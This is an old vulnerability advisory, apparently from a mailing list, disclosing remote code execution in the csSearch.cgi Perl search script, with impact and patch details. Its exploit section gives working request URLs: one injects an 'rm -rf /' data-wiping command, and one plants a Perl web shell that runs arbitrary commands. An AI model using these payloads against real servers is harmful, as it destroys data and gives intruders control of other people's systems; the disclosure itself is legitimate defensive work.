CGIscript.net - csSearch.cgi - Remote Code Execution (up to 17,000 sites vulnerable) --------------------------------------------------------------------- Name : csSearch.cgi - Remote Code Execution Date : March 25, 2002 Product : csSearch Version : 2.3 (vulnerable) Vuln Type : Access Validation Error Severity : HIGH RISK Vendor : WWW.CGIscript.NET, LLC. Homepage : http://www.cgiscript.net/ DISCUSSION: --------------------------------------------------------------------- csSearch is a free perl cgi search script developed by Mike Barone and Andy Angrick. According to the website (cgiscript.net) over 17,000 people have downloaded csSearch. csSearch stores it's configuration data as perl code in a file called "setup.cgi" which is eval()uated by the script to load it back into memory at runtime. Due to an Access Validation Error, any user can cause configuration data to be written to "setup.cgi" and therefore execute arbitrary perl code on the server. The paid version of this script, csSearch Pro, may also be vulnerable. EXPLOIT: --------------------------------------------------------------------- Configuration data is saved with the following URL. Note that any perl code would need to be URL encoded. csSearch.cgi?command=savesetup&setup=PERL_CODE_HERE For example, the classic "rm -rf /" example would be as follows: csSearch.cgi?command=savesetup&setup=`rm%20-rf%20/` Here's something a little more interesting, less than 300 bytes of code that turns csSearch into a remote web shell of sorts. *ShowSearchForm = *Login = sub { print "<form method=post action=csSearch.cgi>Enter Command (eg: ls -l)<br>"; print "<input type=text name=cmd size=99> "; print "<input type=submit value=Execute><hr><xmp>"; $in{'cmd'} && print `$in{'cmd'} 2>&1`; exit; }; URL Encoded as: csSearch.cgi?command=savesetup&setup=*ShowSearchForm%3D*Login%3Dsub{print"<form+method%3Dpost+action%3DcsSearch.cgi>Enter+Command+(example:+ls+-l)<br><input+type%3Dtext+name%3Dcmd+size%3D99>+<input+type%3Dsubmit+value%3DExecute><hr><xmp>";$in{'cmd'}%26%26print`$in{'cmd'}+2>%261`;exit;}; IMPACT: --------------------------------------------------------------------- Because of the high number of users who have downloaded this script (over 17,000 according to cgiscript.net) and the fact that search engines can easily be used to identify sites with the unique "csSearch.cgi" script name, the risk posed by this flaw is very high indeed. SOLUTION: --------------------------------------------------------------------- Vendor has released a new version, csSearch 2.5, which patches the flaw. ISPs and Web hosts may want to consider searching for this script on their servers ("csSearch.cgi") and disabling it or advising their customers of the risk until they can install the patched version. DISCLAIMER --------------------------------------------------------------------- The information within this document may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any consequences whatsoever arising out of or in connection with the use or spread of this information. Any use of this information lays within the user's responsibility. FEEDBACK: --------------------------------------------------------------------- stegus1@yahoo.com __________________________________________________ Do You Yahoo!? Yahoo! Movies - coverage of the 74th Academy Awards® http://movies.yahoo.com/
